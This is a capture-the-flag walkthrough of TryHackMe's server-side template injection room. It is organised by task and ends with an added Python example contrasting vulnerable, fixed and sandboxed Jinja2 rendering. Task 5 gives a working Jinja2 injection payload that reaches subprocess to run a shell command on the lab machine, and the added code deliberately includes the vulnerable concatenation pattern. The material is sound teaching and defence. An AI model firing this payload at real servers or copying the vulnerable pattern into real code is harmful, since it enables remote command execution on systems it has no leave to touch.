TryHackMe - SSTI (Server-Side Template Injection) - Walkthrough
Introduction
Today we're going to be doing a walkthrough for the SSTI (Server-Side Template Injection) room hosted at https://tryhackme.com/room/learnssti. For this walkthrough, we'll be using two virtual machines (VMs): a Kali Linux VM as our attacking machine, and the deployed SSTI vulnerable VM as the victim machine.
Task 1 - Introduction
Questions
Understand all of the above.
No answer needed
Task 2 - Detection
Questions
What sequence of characters causes the application to throw an error?
The answer is contained within the room's answer format.
Task 3 - Identification
Questions
What template engine is being used in this application?
Navigate to the following URL in our web browser:
http://10.10.6.245:5000/profile/{{7*'7'}}
Compare the results to the contents of the URL below:
https://portswigger.net/research/server-side-template-injection#Identify
Task 4 - Syntax
Questions
How do you start a comment in Jinja2?
Search within the following URL (search term: “comment”)
https://jinja.palletsprojects.com/en/2.11.x/api/#jinja2.Environment
Task 5 - Exploitation
Questions
What is the result of the "whoami" shell command?
Navigate to the following URL in our web browser:
http://10.10.6.245:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}
Task 6 - Examination
Questions
Understand all of the above.
No answer needed
Task 7 - Remediation
Questions
Understand all of the above.
No answer needed
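Added example, not from the room or the original walkthrough: the Task 3 probe rendered by the vulnerable pattern (template text built from user input) beside the fixed pattern (input passed as a template variable), plus a SandboxedEnvironment that refuses the attribute traversal the Task 5 payload starts with. Assumes the jinja2 package is installed; the function names are mine.

```python
# Added example (not part of the TryHackMe room or the original walkthrough).
# Requires: pip install jinja2
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# The Task 3 probe. Jinja2 evaluates 7*'7' as Python string repetition,
# which is how the room tells it apart from engines that return 49.
PROBE = "{{7*'7'}}"

# Prefix of the Task 5 payload; a sandbox must refuse the dunder lookup.
TRAVERSAL = "{{ ''.__class__.__mro__[1] }}"


def render_vulnerable(name: str) -> str:
    """Bug pattern: user input becomes part of the template source."""
    env = Environment()
    return env.from_string("Hello " + name + "!").render()


def render_fixed(name: str) -> str:
    """Fix: template source is fixed by the developer, input is a variable."""
    env = Environment()
    return env.from_string("Hello {{ name }}!").render(name=name)


def render_sandboxed(template_src: str) -> str:
    """Defence in depth when template text must come from outside:
    SandboxedEnvironment blocks access to underscore attributes."""
    env = SandboxedEnvironment()
    try:
        return env.from_string(template_src).render()
    except SecurityError as exc:
        return "blocked: " + str(exc)


if __name__ == "__main__":
    print(render_vulnerable(PROBE))   # probe is evaluated -> Hello 7777777!
    print(render_fixed(PROBE))        # probe is echoed as plain text
    print(render_sandboxed(TRAVERSAL))  # blocked: ... is unsafe
```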
Task 8 - Case Study
Questions
What payload was used to confirm SSTI?
Navigate to the following URL and search the page for the term “{{”:
https://hackerone.com/reports/125980
Finish